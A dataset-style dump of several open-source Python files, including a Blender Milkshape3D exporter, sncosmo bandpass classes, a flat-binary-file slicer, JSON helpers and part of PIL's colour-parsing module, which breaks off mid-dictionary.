text
stringlengths 6
947k
| repo_name
stringlengths 5
100
| path
stringlengths 4
231
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 6
947k
| score
float64 0
0.34
|
---|---|---|---|---|---|---|
# ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
# Copyright (C) 2004-2015: Paul Vint [email protected]
"""
This script exports Milkshape3d text files from Blender (http://www.blender.org). It supports face and vertex normals,
colours, and texture coordinates per face or per vertex.
Only one mesh can be exported at a time.
"""
import bpy
import os
DEBUG = True
def getPrimaryVertexGroup(_vgroups, _v):
g = -1
w = 0
## Scan through any vertex groups and return the index of the one with the highest weight (or -1 if none)
for vertgroup in _v.groups:
if (vertgroup.weight > w):
w = vertgroup.weight
g = vertgroup.group
#fw("xx%fxx" % vertgroup.group)
return g
def face_iter_func(mesh):
uv_layer = mesh.uv_textures.active.data
uv_layer_len = len(uv_layer)
faces = mesh.faces
for i in range(uv_layer_len):
uv_elem = uv_layer[i]
yield (i, uv_layer[i].uv)
def save(operator,
context,
filepath="",
use_modifiers=True,
use_normals=True,
use_uv_coords=True,
use_colors=True,
):
def rvec3d(v):
return round(v[0], 6), round(v[1], 6), round(v[2], 6)
def rvec2d(v):
return round(v[0], 6), round(v[1], 6)
scene = context.scene
obj = context.active_object
if not obj:
raise Exception("Error, Select 1 active object")
# Multiple meshes
objects = context.selected_objects
file = open(filepath, "w", encoding="utf8", newline="\n")
fw = file.write
fw("// Milkshape 3D ASCII\n\n")
fw("Frames: 30\n")
fw("Frame: 1\n\n")
if scene.objects.active:
bpy.ops.object.mode_set(mode='OBJECT')
o = 0
numArmatures = 0
numMeshes = 0
# count the meshes
for obj in objects:
if obj.type == "MESH":
numMeshes = numMeshes + 1
fw("Meshes: %d\n" % numMeshes)
for obj in objects:
## Check if it's an armature
if obj.type == "ARMATURE":
numArmatures = numArmatures + 1
else:
if use_modifiers:
mesh = obj.to_mesh(scene, True, 'PREVIEW')
else:
mesh = obj.data
if not mesh:
raise Exception("Error, could not get mesh data from active object")
# mesh.transform(obj.matrix_world) # XXX
has_uv = (len(mesh.uv_textures) > 0)
has_uv_vertex = (len(mesh.sticky) > 0)
# FIXME
#has_uv = True
has_vcol = len(mesh.vertex_colors) > 0
#if (not has_uv) and (not has_uv_vertex):
# use_uv_coords = False
if not has_vcol:
use_colors = False
if not use_uv_coords:
has_uv = has_uv_vertex = False
if not use_colors:
has_vcol = False
if has_uv:
active_uv_layer = mesh.uv_textures.active
if not active_uv_layer:
use_uv_coords = False
has_uv = False
else:
active_uv_layer = active_uv_layer.data
if False: # Testing
for i, uv in face_iter_func(mesh):
fw("%d %f \n" % (i, uv[0][0]))
return True
## Get UV list
if has_uv:
faceUVs = []
for i, uv in face_iter_func(mesh):
faceUVs.append(uv)
if has_vcol:
active_col_layer = mesh.vertex_colors.active
if not active_col_layer:
use_colors = False
has_vcol = False
else:
active_col_layer = active_col_layer.data
# in case
color = uvcoord = uvcoord_key = normal = normal_key = None
mesh_verts = mesh.vertices # save a lookup
ply_verts = [] # list of dictionaries
# vdict = {} # (index, normal, uv) -> new index
vdict = [{} for i in range(len(mesh_verts))]
ply_faces = [[] for f in range(len(mesh.faces))]
vert_count = 0
## Vertex Group Testing
vGroups = []
vGroupsIndices = []
if (obj.vertex_groups):
for x in obj.vertex_groups:
#fw("=%d %s\n" % (x.index, x.name))
vGroups.append({x.index, x.name})
vGroupsIndices.append(x.index)
## Yielded:
#0 Bone
#1 Bone.002
#2 Bone.001
for i, f in enumerate(mesh.faces):
# GOOD: fw("Verts: %d %d %d\n" % (f.vertices[0], f.vertices[1], f.vertices[2]))
smooth = f.use_smooth
if not smooth:
normal = tuple(f.normal)
normal_key = rvec3d(normal)
if has_uv:
uv = active_uv_layer[i]
uv = uv.uv1, uv.uv2, uv.uv3, uv.uv4 # XXX - crufty :/
if has_vcol:
col = active_col_layer[i]
col = col.color1[:], col.color2[:], col.color3[:], col.color4[:]
f_verts = f.vertices
pf = ply_faces[i]
## FIXME Deprecated
for j, vidx in enumerate(f_verts):
v = mesh_verts[vidx]
if smooth:
normal = tuple(v.normal)
normal_key = rvec3d(normal)
if has_uv:
uvcoord = uv[j][0], 1.0 - uv[j][1]
uvcoord_key = rvec2d(uvcoord)
elif has_uv_vertex:
uvcoord = v.uvco[0], 1.0 - v.uvco[1]
uvcoord_key = rvec2d(uvcoord)
if has_vcol:
color = col[j]
color = (int(color[0] * 255.0),
int(color[1] * 255.0),
int(color[2] * 255.0),
)
key = normal_key, uvcoord_key, color
vdict_local = vdict[vidx]
pf_vidx = vdict_local.get(key) # Will be None initially
if pf_vidx is None: # same as vdict_local.has_key(key)
pf_vidx = vdict_local[key] = vert_count
ply_verts.append((vidx, normal, uvcoord, color))
vert_count += 1
pf.append(pf_vidx)
# Mesh name, flags, material index
fw("\"%s\" 0 %d\n" % (obj.name, o))
#fw("%d\n" % (len(mesh.faces) * 3))
#if use_colors:
# fw("property uchar red\n"
# "property uchar green\n"
# "property uchar blue\n")
#fw("element face %d\n" % len(mesh.faces))
#fw("property list uchar uint vertex_indices\n")
#fw("end_header\n")
# mesh.vertices is array of vertex coords
# face.vertices is array of vertex indices
# to get unique vertices in the file create an array of all vertices and
# then find the highest index in the list of faces and use only up to
# that one to only have unique vertices
maxIndex = 0
numVerts = 0
for f in mesh.faces:
for v in f.vertices:
numVerts = numVerts + 1
if (v >= maxIndex):
maxIndex = v
maxIndex = maxIndex + 1
#fw("%d\n" % (maxIndex))
## create array of verts
vco = []
fverts = []
## make a properly ordered list of vertices
for f in mesh.faces:
for v in mesh.vertices:
fverts.append(v)
### The following method is crap - need to duplicate verts for when they have different
### UV coords for different faces!
#for i in range(0, maxIndex):
#fw("0 %.4f %.4f %.4f " % (-fverts[i].co[0], fverts[i].co[2], -fverts[i].co[1]))
#fw('0.0, 0.0') # uv
# Vertex Group
#vg = getPrimaryVertexGroup(vGroups, fverts[i])
#fw(" %d\n" % vg)
## Prep for UVs
activeUV = mesh.uv_textures[0].data
#if has_uv:
# actuveUV = mesh.uv_textures
### Dump each vert on each face
fw("%d\n" % numVerts)
fIdx = 0
for f in mesh.faces:
if (len(f.vertices) != 3):
raise Exception("Error! All faces must be triangles. (Convert in edit mode by pressing CTRL-t)")
## Loop through each vertex in the face
vIdx = 0
uv = activeUV[fIdx]
fuv = uv.uv1, uv.uv2, uv.uv3
for v in f.vertices:
fw("0 %.4f %.4f %.4f " % (-fverts[v].co[0], fverts[v].co[2], -fverts[v].co[1]))
## uv coords
#for i, uv in face_iter_func(mesh):
#fw("%d %f \n" % (i, uv[0][0]))
if has_uv:
fw("%.4f %.4f " % (faceUVs[fIdx][vIdx][0], 1.0 - faceUVs[fIdx][vIdx][1]))
#fw("%.4f %.4f " % (fverts[v].uv[0], 1 - fverts[v].uv[1]))
else:
fw("0.0000 0.0000 ");
## Vertex Group
if not obj.vertex_groups:
vg = -1
else:
vg = getPrimaryVertexGroup(vGroups, fverts[v])
fw("%d\n" % vg)
vIdx = vIdx + 1
fIdx = fIdx + 1
# Repeat the above loop to get vertex normals
fw("%d\n" % numVerts)
for f in mesh.faces:
## Test if using smoothing or not
if f.use_smooth:
## Loop through each vertex in the face
for v in f.vertices:
fw("%.4f %.4f %.4f\n" % (-fverts[v].normal[0], fverts[v].normal[2], -fverts[v].normal[1]))
else:
for v in f.vertices:
fw("%.4f %.4f %.4f\n" % (-f.normal[0], f.normal[2], -f.normal[1]))
# Get Face info
# TODO: Smoothing groups
# A bit BFI, but vertices are in order
fw("%d\n" % len(ply_faces))
v = 0
for f in mesh.faces:
fw("1 %d %d %d" % (v + 2, v + 1, v))
fw(" %d %d %d 1\n" % (v + 2, v + 1, v))
v = v + 3
o = o + 1
## Materials
# Note: Limiting to one mat per mesh, and assuming every mesh has one
world = scene.world
if world:
world_amb = world.ambient_color
else:
world_amb = Color((0.0, 0.0, 0.0))
fw("\nMaterials: %d\n" % o)
o = 0
for obj in objects:
if obj.type != "ARMATURE":
materials = obj.data.materials[:]
mat = materials[0]
fw("\"Mat%d\"\n" % o)
## ambient
fw('%.6f %.6f %.6f 1.000000\n' % (mat.diffuse_color * mat.ambient)[:])
## Diffues
fw("%.6f %.6f %.6f 1.000000\n" % (mat.diffuse_intensity * mat.diffuse_color)[:])
fw("%.6f %.6f %.6f 1.000000\n" % (mat.specular_intensity * mat.specular_color)[:]) # Specular
fw('%.6f %.6f %.6f 1.000000\n' % (mat.diffuse_color * mat.emit)[:])
fw("%.6f\n" % mat.specular_hardness)
fw("%.6f\n" % mat.alpha)
if (len(obj.data.uv_textures) > 0):
uv_layer = obj.data.uv_textures.active.data[:]
uv_image = uv_layer[0].image
if (uv_image):
fw("\"%s\"\n" % uv_image.filepath)
else:
fw("\"\"\n")
else:
fw("\"\"\n")
# TODO: Alpha texture
fw("\"\"\n")
o = o + 1
fw("\n")
#fw("Bones: %d\n" % numArmatures)
numBones = 0
# count the bones
for obj in objects:
if obj.type == "ARMATURE":
for b in obj.pose.bones:
numBones = numBones + 1
fw("Bones: %d\n" % numBones)
# export the bones
for obj in objects:
if obj.type == "ARMATURE":
for b in obj.pose.bones:
## Give the file the bone!
## Bone Name
fw("\"%s\"\n" % b.name)
## Parent Name
if (len(b.parent_recursive) > 0 ):
fw("\"%s\"\n" % b.parent.name)
else:
fw("\"\"\n")
## // joint: flags, posx, posy, posz, rotx, roty, rotz
## Looking at examples the flag appears to always be 24 (?)
## Not sure how to get rot - skip it for now
fw("24 %.6f %.6f %.6f 0 0 0\n" % ( -b.head[0], b.head[2], -b.head[1]))
## Number of position keys - using the number of frames in the anim sequence
fw("%d\n" % (scene.frame_end - scene.frame_start))
## FIXME Not sure how to handle time, just doing 1 sec per frame for now
secs = 1
## // position key: time, posx, posy, posz
for frame in range(scene.frame_start, scene.frame_end):
## Go to the first frame
scene.frame_set(frame)
fw("%.6f %.6f %.6f %.6f\n" % ( secs, -b.tail[0], b.tail[2], -b.tail[1]))
secs = secs + 1
### Rotation Keys
# Just using number of frames for now with rots all 0.0
fw("%d\n" % (scene.frame_end - scene.frame_start))
for frame in range(scene.frame_start, scene.frame_end):
fw("%d 0.000000 0.000000 0.000000\n" % secs)
## End of this bone
fw("\n")
fw("GroupComments: 0\n")
fw("MaterialComments: 0\n")
fw("BoneComments: 0\n")
fw("ModelComment: 0\n")
file.close()
print("writing %r done" % filepath)
if use_modifiers:
bpy.data.meshes.remove(mesh)
# XXX
"""
if is_editmode:
Blender.Window.EditMode(1, "", 0)
"""
return {'FINISHED'}
| pvint/Blender2MS3d | io_mesh_ms3d/export_ms3d.py | Python | gpl-2.0 | 11,954 | 0.03915 |
# Licensed under a 3-clause BSD style license - see LICENSE.rst
import copy
import astropy.units as u
import numpy as np
from astropy.io import ascii
from astropy.utils import lazyproperty
from scipy.interpolate import splev, splrep
from ._registry import Registry
from .constants import HC_ERG_AA, SPECTRUM_BANDFLUX_SPACING
from .utils import integration_grid
__all__ = ['get_bandpass', 'read_bandpass', 'Bandpass', 'AggregateBandpass',
'BandpassInterpolator']
_BANDPASSES = Registry()
_BANDPASS_INTERPOLATORS = Registry()
def get_bandpass(name, *args):
"""Get a Bandpass from the registry by name."""
if isinstance(name, Bandpass):
return name
if len(args) == 0:
return _BANDPASSES.retrieve(name)
else:
interp = _BANDPASS_INTERPOLATORS.retrieve(name)
return interp.at(*args)
def read_bandpass(fname, fmt='ascii', wave_unit=u.AA,
trans_unit=u.dimensionless_unscaled,
normalize=False, trim_level=None, name=None):
"""Read bandpass from two-column ASCII file containing wavelength and
transmission in each line.
Parameters
----------
fname : str
File name.
fmt : {'ascii'}
File format of file. Currently only ASCII file supported.
wave_unit : `~astropy.units.Unit` or str, optional
Wavelength unit. Default is Angstroms.
trans_unit : `~astropy.units.Unit`, optional
Transmission unit. Can be `~astropy.units.dimensionless_unscaled`,
indicating a ratio of transmitted to incident photons, or units
proportional to inverse energy, indicating a ratio of transmitted
photons to incident energy. Default is ratio of transmitted to
incident photons.
normalize : bool, optional
If True, normalize fractional transmission to be 1.0 at peak.
It is recommended to set to True if transmission is in units
of inverse energy. (When transmission is given in these units, the
absolute value is usually not significant; normalizing gives more
reasonable transmission values.) Default is False.
name : str, optional
Identifier. Default is `None`.
Returns
-------
band : `~sncosmo.Bandpass`
"""
if fmt != 'ascii':
raise ValueError("format {0} not supported. Supported formats: 'ascii'"
.format(fmt))
t = ascii.read(fname, names=['wave', 'trans'])
return Bandpass(t['wave'], t['trans'], wave_unit=wave_unit,
trans_unit=trans_unit, normalize=normalize,
trim_level=trim_level, name=name)
def slice_exclude_below(a, minvalue, grow=1):
"""Contiguous range in 1-d array `a` that excludes values less than
`minvalue`. Range is expanded by `grow` in each direction."""
idx = np.flatnonzero(a >= minvalue)
i0 = max(idx[0] - grow, 0)
i1 = min(idx[-1] + 1 + grow, len(a)) # exclusive
return slice(i0, i1)
class Bandpass(object):
"""Transmission as a function of spectral wavelength.
Parameters
----------
wave : list_like
Wavelength. Monotonically increasing values.
trans : list_like
Transmission fraction.
wave_unit : `~astropy.units.Unit` or str, optional
Wavelength unit. Default is Angstroms.
trans_unit : `~astropy.units.Unit`, optional
Transmission unit. Can be `~astropy.units.dimensionless_unscaled`,
indicating a ratio of transmitted to incident photons, or units
proportional to inverse energy, indicating a ratio of transmitted
photons to incident energy. Default is ratio of transmitted to
incident photons.
normalize : bool, optional
If True, normalize fractional transmission to be 1.0 at peak.
It is recommended to set normalize=True if transmission is in units
of inverse energy. (When transmission is given in these units, the
absolute value is usually not significant; normalizing gives more
reasonable transmission values.) Default is False.
trim_level : float, optional
If given, crop bandpass to region where transmission is above this
fraction of the maximum transmission. For example, if maximum
transmission is 0.5, ``trim_level=0.001`` will remove regions where
transmission is below 0.0005. Only contiguous regions on the sides
of the bandpass are removed.
name : str, optional
Identifier. Default is `None`.
Examples
--------
Construct a Bandpass and access the input arrays:
>>> b = Bandpass([4000., 4200., 4400.], [0.5, 1.0, 0.5])
>>> b.wave
array([ 4000., 4200., 4400.])
>>> b.trans
array([ 0.5, 1. , 0.5])
Bandpasses act like continuous 1-d functions (linear interpolation is
used):
>>> b([4100., 4300.])
array([ 0.75, 0.75])
The effective (transmission-weighted) wavelength is a property:
>>> b.wave_eff
4200.0
The ``trim_level`` keyword can be used to remove "out-of-band"
transmission upon construction. The following example removes regions of
the bandpass with tranmission less than 1 percent of peak:
>>> band = Bandpass([4000., 4100., 4200., 4300., 4400., 4500.],
... [0.001, 0.002, 0.5, 0.6, 0.003, 0.001],
... trim_level=0.01)
>>> band.wave
array([ 4100., 4200., 4300., 4400.])
>>> band.trans
array([ 0.002, 0.5 , 0.6 , 0.003])
While less strictly correct than including the "out-of-band" transmission,
only considering the region of the bandpass where transmission is
significant can improve model-bandpass overlap as well as performance.
"""
def __init__(self, wave, trans, wave_unit=u.AA,
trans_unit=u.dimensionless_unscaled, normalize=False,
name=None, trim_level=None):
wave = np.asarray(wave, dtype=np.float64)
trans = np.asarray(trans, dtype=np.float64)
if wave.shape != trans.shape:
raise ValueError('shape of wave and trans must match')
if wave.ndim != 1:
raise ValueError('only 1-d arrays supported')
# Ensure that units are actually units and not quantities, so that
# `to` method returns a float and not a Quantity.
wave_unit = u.Unit(wave_unit)
trans_unit = u.Unit(trans_unit)
if wave_unit != u.AA:
wave = wave_unit.to(u.AA, wave, u.spectral())
# If transmission is in units of inverse energy, convert to
# unitless transmission:
#
# (transmitted photons / incident photons) =
# (photon energy) * (transmitted photons / incident energy)
#
# where photon energy = h * c / lambda
if trans_unit != u.dimensionless_unscaled:
trans = (HC_ERG_AA / wave) * trans_unit.to(u.erg**-1, trans)
# Check that values are monotonically increasing.
# We could sort them, but if this happens, it is more likely a user
# error or faulty bandpass definition. So we leave it to the user to
# sort them.
if not np.all(np.ediff1d(wave) > 0.):
raise ValueError('bandpass wavelength values must be monotonically'
' increasing when supplied in wavelength or '
'decreasing when supplied in energy/frequency.')
if normalize:
trans /= np.max(trans)
# Trim "out-of-band" transmission
if trim_level is not None:
s = slice_exclude_below(trans, np.max(trans) * trim_level, grow=1)
wave = wave[s]
trans = trans[s]
# if more than one leading or trailing transmissions are zero, we
# can remove them.
if ((trans[0] == 0.0 and trans[1] == 0.0) or (trans[-1] == 0.0 and
trans[-2] == 0.0)):
i = 0
while i < len(trans) and trans[i] == 0.0:
i += 1
if i == len(trans):
raise ValueError('all zero transmission')
j = len(trans) - 1
while j >= 0 and trans[j] == 0.0:
j -= 1
# back out to include a single zero
if i > 0:
i -= 1
if j < len(trans) - 1:
j += 1
wave = wave[i:j+1]
trans = trans[i:j+1]
self.wave = wave
self.trans = trans
# Set up interpolation.
# This appears to be the fastest-evaluating interpolant in
# scipy.interpolate.
self._tck = splrep(self.wave, self.trans, k=1)
self.name = name
def minwave(self):
return self.wave[0]
def maxwave(self):
return self.wave[-1]
@lazyproperty
def wave_eff(self):
"""Effective wavelength of bandpass in Angstroms."""
wave, _ = integration_grid(self.minwave(), self.maxwave(),
SPECTRUM_BANDFLUX_SPACING)
weights = self(wave)
return np.sum(wave * weights) / np.sum(weights)
def __call__(self, wave):
return splev(wave, self._tck, ext=1)
def __repr__(self):
name = ''
if self.name is not None:
name = ' {!r}'.format(self.name)
return "<{:s}{:s} at 0x{:x}>".format(self.__class__.__name__, name,
id(self))
def shifted(self, factor, name=None):
"""Return a new Bandpass instance with all wavelengths
multiplied by a factor."""
return Bandpass(factor * self.wave, self.trans, name=name)
class _SampledFunction(object):
"""Represents a 1-d continuous function, used in AggregateBandpass."""
def __init__(self, x, y):
self.x = np.asarray(x, dtype=np.float64)
self.y = np.asarray(y, dtype=np.float64)
self.xmin = x[0]
self.xmax = x[-1]
self._tck = splrep(self.x, self.y, k=1)
def __call__(self, x):
return splev(x, self._tck, ext=1)
class AggregateBandpass(Bandpass):
"""Bandpass defined by multiple transmissions in series.
Parameters
----------
transmissions : list of (wave, trans) pairs.
Functions defining component transmissions.
prefactor : float, optional
Scalar factor to multiply transmissions by. Default is 1.0.
name : str, optional
Name of bandpass.
family : str, optional
Name of "family" this bandpass belongs to. Such an identifier can
be useful for identifying bandpasses belonging to the same
instrument/filter combination but different focal plane
positions.
"""
def __init__(self, transmissions, prefactor=1.0, name=None, family=None):
if len(transmissions) < 1:
raise ValueError("empty list of transmissions")
# Set up transmissions as `_SampledFunction`s.
#
# We allow passing `_SampledFunction`s directly to allow
# RadialBandpassGenerator to generate AggregateBandpasses a
# bit more efficiently, even though _SampledFunction isn't
# part of the public API.
self.transmissions = [t if isinstance(t, _SampledFunction)
else _SampledFunction(t[0], t[1])
for t in transmissions]
self.prefactor = prefactor
self.name = name
self.family = family
# Determine min/max wave: since sampled functions are zero outside
# their domain, minwave is the *largest* minimum x value, and
# vice-versa for maxwave.
self._minwave = max(t.xmin for t in self.transmissions)
self._maxwave = min(t.xmax for t in self.transmissions)
def minwave(self):
return self._minwave
def maxwave(self):
return self._maxwave
def __str__(self):
return ("AggregateBandpass: {:d} components, prefactor={!r}, "
"range=({!r}, {!r}), name={!r}"
.format(len(self.transmissions), self.prefactor,
self.minwave(), self.maxwave(), self.name))
def __call__(self, wave):
t = self.transmissions[0](wave)
for trans in self.transmissions[1:]:
t *= trans(wave)
t *= self.prefactor
return t
def shifted(self, factor, name=None, family=None):
"""Return a new AggregateBandpass instance with all wavelengths
multiplied by a factor."""
transmissions = [(factor * t.x, t.y) for t in self.transmissions]
return AggregateBandpass(transmissions,
prefactor=self.prefactor,
name=name, family=family)
class BandpassInterpolator(object):
"""Bandpass generator defined as a function of focal plane position.
Instances of this class are not Bandpasses themselves, but
generate Bandpasses at a given focal plane position. This class
stores the transmission as a function of focal plane position and
interpolates between the defined positions to return the bandpass
at an arbitrary position.
Parameters
----------
transmissions : list of (wave, trans) pairs
Transmissions that apply everywhere in the focal plane.
dependent_transmissions : list of (value, wave, trans)
Transmissions that depend on some parameter. Each `value` is the
scalar parameter value, `wave` and `trans` are 1-d arrays.
prefactor : float, optional
Scalar multiplying factor.
name : str
Examples
--------
Transmission uniform across focal plane:
>>> uniform_trans = ([4000., 5000.], [1., 0.5]) # wave, trans
Transmissions as a function of radius:
>>> trans0 = (0., [4000., 5000.], [0.5, 0.5]) # radius=0
>>> trans1 = (1., [4000., 5000.], [0.75, 0.75]) # radius=1
>>> trans2 = (2., [4000., 5000.], [0.1, 0.1]) # radius=2
>>> band_interp = BandpassInterpolator([uniform_trans],
... [trans0, trans1, trans2],
... name='my_band')
Min and max radius:
>>> band_interp.minpos(), band_interp.maxpos()
(0.0, 2.0)
Get bandpass at a given radius:
>>> band = band_interp.at(1.5)
>>> band
<AggregateBandpass 'my_band at 1.500000' at 0x7f7a2e425668>
The band is aggregate of uniform transmission part,
and interpolated radial-dependent part.
>>> band([4500., 4600.])
array([ 0.65625, 0.6125 ])
"""
def __init__(self, transmissions, dependent_transmissions,
prefactor=1.0, name=None):
# create sampled functions for normal transmissions
self.transmissions = [_SampledFunction(t[0], t[1])
for t in transmissions]
# ensure dependent transmissions are sorted
sorted_trans = sorted(dependent_transmissions, key=lambda x: x[0])
self.dependent_transmissions = [(t[0], _SampledFunction(t[1], t[2]))
for t in sorted_trans]
self.prefactor = prefactor
self.name = name
def minpos(self):
"""Minimum positional parameter value."""
return self.dependent_transmissions[0][0]
def maxpos(self):
"""Maximum positional parameter value."""
return self.dependent_transmissions[-1][0]
def at(self, pos):
"""Return the bandpass at the given position"""
if pos < self.minpos() or pos >= self.maxpos():
raise ValueError("Position outside bounds")
# find index such that t[i-1] <= pos < t[i]
i = 1
while (i < len(self.dependent_transmissions) and
pos > self.dependent_transmissions[i][0]):
i += 1
# linearly interpolate second transmission onto first
v0, f0 = self.dependent_transmissions[i-1]
v1, f1 = self.dependent_transmissions[i]
w1 = (pos - v0) / (v1 - v0)
w0 = 1.0 - w1
x = f0.x
y = w0 * f0.y + w1 * f1(x)
f = _SampledFunction(x, y)
transmissions = copy.copy(self.transmissions) # shallow copy the list
transmissions.append(f)
name = "" if self.name is None else (self.name + " ")
name += "at {:f}".format(pos)
return AggregateBandpass(transmissions, prefactor=self.prefactor,
name=name, family=self.name)
| sncosmo/sncosmo | sncosmo/bandpasses.py | Python | bsd-3-clause | 16,460 | 0 |
#!/usr/bin/env python
from . import memfbf
from numpy import append
import os
import logging
from glob import glob
LOG = logging.getLogger(__name__)
class SlicerFrame(dict):
pass
class FBFSlicer(object):
"""Given a workspace directory of flat binary files, grab all useful filenames and return a record of data at a
time as a python dictionary.
"""
def __init__(self, work_dir, buffer_size=0, filename_filter=None):
"""Initialize slicer object parameters.
:param work_dir: Workspace directory of flat binary files to read
:param buffer_size: Circular buffer size or 0 for non-circular buffers/FBFs
:param filename_filter: Filter function that returns True if the provided file should be opened for reading.
Should return False otherwise.
"""
self._wd = work_dir
self._buffer_size = buffer_size
self._open_files = dict()
if filename_filter is None:
filename_filter = lambda filename: True
self.should_include = filename_filter
def _update_open_files(self):
for fn in glob(os.path.join(self._wd, '*')):
if fn not in self._open_files and self.should_include(os.path.split(fn)[-1]):
LOG.debug('opening %s' % fn)
try:
nfo = memfbf.FBF(fn)
except Exception as oops:
nfo = None
LOG.info('%s could not be opened as FBF' % fn)
LOG.debug(repr(oops))
LOG.debug('found new file %s' % fn)
self._open_files[fn] = nfo
def __call__(self, first_record, last_record=None):
"""Retrieve a slice of a FBF directory using inclusive 1-based record number range, noting
that last-first+1 records are returned.
"""
last_record = first_record if last_record is None else last_record
if not self._open_files:
self._update_open_files()
data = SlicerFrame()
for name, nfo in self._open_files.items():
if nfo is not None:
# note we use % in order to deal with
# wavenumber files that are only ever 1 record long
# circular buffers which are fixed length files
file_len = nfo.length()
# check for non-circular buffer case and going off the end of the file
# note use of > since record numbers are 1-based
if (self._buffer_size == 0) and (file_len != 1) and (first_record > file_len or last_record > file_len):
LOG.warning('%s: length is %d but start-end is %d-%d' % (name, file_len, first_record, last_record))
return None
# check for circular buffers that aren't preallocated properly
if self._buffer_size > 0 and file_len not in (1, self._buffer_size):
LOG.info('buffer file %s size mismatch (%d != %d)! ignoring' % (name, file_len, self._buffer_size))
else:
# 0-based circular buffer
first_index = (first_record - 1) % file_len
last_index = (last_record - 1) % file_len
if last_index >= first_index:
# Records are in one continuous line
idx = slice(first_index, last_index + 1) # +1 to include last item
data[nfo.stemname] = nfo[idx]
else:
# Records are on two ends of the circular buffer
idx1 = slice(first_index, self._buffer_size)
idx2 = slice(0, last_index + 1) # +1 to include last item
arr1 = nfo[idx1]
arr2 = nfo[idx2]
data[nfo.stemname] = append(arr1, arr2, axis=0)
return data
| davidh-ssec/pyfbf | pyfbf/slicer.py | Python | gpl-3.0 | 3,928 | 0.003564 |
import json
def jsonSave(data, fileName, indent=True, sort=False, oneLine=False):
f = open(fileName, 'w')
if indent:
f.write(json.dumps(data, indent=4, sort_keys=sort))
else:
f.write(json.dumps(data, sort_keys=sort))
f.close()
def jsonLoad(fileName):
try:
file = open(fileName)
t=file.read()
file.close()
return json.loads(t)
except:
return {} | tannerbohn/ScholarVR | Code/fileIO.py | Python | gpl-2.0 | 368 | 0.05163 |
#
# The Python Imaging Library
# $Id$
#
# map CSS3-style colour description strings to RGB
#
# History:
# 2002-10-24 fl Added support for CSS-style color strings
# 2002-12-15 fl Added RGBA support
# 2004-03-27 fl Fixed remaining int() problems for Python 1.5.2
# 2004-07-19 fl Fixed gray/grey spelling issues
# 2009-03-05 fl Fixed rounding error in grayscale calculation
#
# Copyright (c) 2002-2004 by Secret Labs AB
# Copyright (c) 2002-2004 by Fredrik Lundh
#
# See the README file for information on usage and redistribution.
#
from PIL import Image
import re
##
# Convert color string to RGB tuple.
#
# @param color A CSS3-style colour string.
# @return An RGB-tuple.
# @exception ValueError If the color string could not be interpreted
# as an RGB value.
def getrgb(color):
"""
Convert a color string to an RGB tuple. If the string cannot be parsed,
this function raises a :py:exc:`ValueError` exception.
.. versionadded:: 1.1.4
:param color: A color string
:return: ``(red, green, blue)``
"""
try:
rgb = colormap[color]
except KeyError:
try:
# fall back on case-insensitive lookup
rgb = colormap[color.lower()]
except KeyError:
rgb = None
# found color in cache
if rgb:
if isinstance(rgb, tuple):
return rgb
colormap[color] = rgb = getrgb(rgb)
return rgb
# check for known string formats
m = re.match("#\w\w\w$", color)
if m:
return (
int(color[1]*2, 16),
int(color[2]*2, 16),
int(color[3]*2, 16)
)
m = re.match("#\w\w\w\w\w\w$", color)
if m:
return (
int(color[1:3], 16),
int(color[3:5], 16),
int(color[5:7], 16)
)
m = re.match("rgb\(\s*(\d+)\s*,\s*(\d+)\s*,\s*(\d+)\s*\)$", color)
if m:
return (
int(m.group(1)),
int(m.group(2)),
int(m.group(3))
)
m = re.match("rgb\(\s*(\d+)%\s*,\s*(\d+)%\s*,\s*(\d+)%\s*\)$", color)
if m:
return (
int((int(m.group(1)) * 255) / 100.0 + 0.5),
int((int(m.group(2)) * 255) / 100.0 + 0.5),
int((int(m.group(3)) * 255) / 100.0 + 0.5)
)
m = re.match("hsl\(\s*(\d+)\s*,\s*(\d+)%\s*,\s*(\d+)%\s*\)$", color)
if m:
from colorsys import hls_to_rgb
rgb = hls_to_rgb(
float(m.group(1)) / 360.0,
float(m.group(3)) / 100.0,
float(m.group(2)) / 100.0,
)
return (
int(rgb[0] * 255 + 0.5),
int(rgb[1] * 255 + 0.5),
int(rgb[2] * 255 + 0.5)
)
m = re.match("rgba\(\s*(\d+)\s*,\s*(\d+)\s*,\s*(\d+)\s*,\s*(\d+)\s*\)$", color)
if m:
return (
int(m.group(1)),
int(m.group(2)),
int(m.group(3)),
int(m.group(4))
)
raise ValueError("unknown color specifier: %r" % color)
def getcolor(color, mode):
"""
Same as :py:func:`~PIL.ImageColor.getrgb`, but converts the RGB value to a
greyscale value if the mode is not color or a palette image. If the string
cannot be parsed, this function raises a :py:exc:`ValueError` exception.
.. versionadded:: 1.1.4
:param color: A color string
:return: ``(red, green, blue)``
"""
# same as getrgb, but converts the result to the given mode
color = getrgb(color)
if mode == "RGB":
return color
if mode == "RGBA":
if len(color) == 3:
color = (color + (255,))
r, g, b, a = color
return r, g, b, a
if Image.getmodebase(mode) == "L":
r, g, b = color
return (r*299 + g*587 + b*114)//1000
return color
colormap = {
# X11 colour table (from "CSS3 module: Color working draft"), with
# gray/grey spelling issues fixed. This is a superset of HTML 4.0
# colour names used in CSS 1.
"aliceblue": "#f0f8ff",
"antiquewhite": "#faebd7",
"aqua": "#00ffff",
"aquamarine": "#7fffd4",
"azure": "#f0ffff",
"beige": "#f5f5dc",
"bisque": "#ffe4c4",
"black": "#000000",
"blanchedalmond": "#ffebcd",
"blue": "#0000ff",
"blueviolet": "#8a2be2",
"brown": "#a52a2a",
"burlywood": "#deb887",
"cadetblue": "#5f9ea0",
"chartreuse": "#7fff00",
"chocolate": "#d2691e",
"coral": "#ff7f50",
"cornflowerblue": "#6495ed",
"cornsilk": "#fff8dc",
"crimson": "#dc143c",
"cyan": "#00ffff",
"darkblue": "#00008b",
"darkcyan": "#008b8b",
"darkgoldenrod": "#b8860b",
"darkgray": "#a9a9a9",
"darkgrey": "#a9a9a9",
"darkgreen": "#006400",
"darkkhaki": "#bdb76b",
"darkmagenta": "#8b008b",
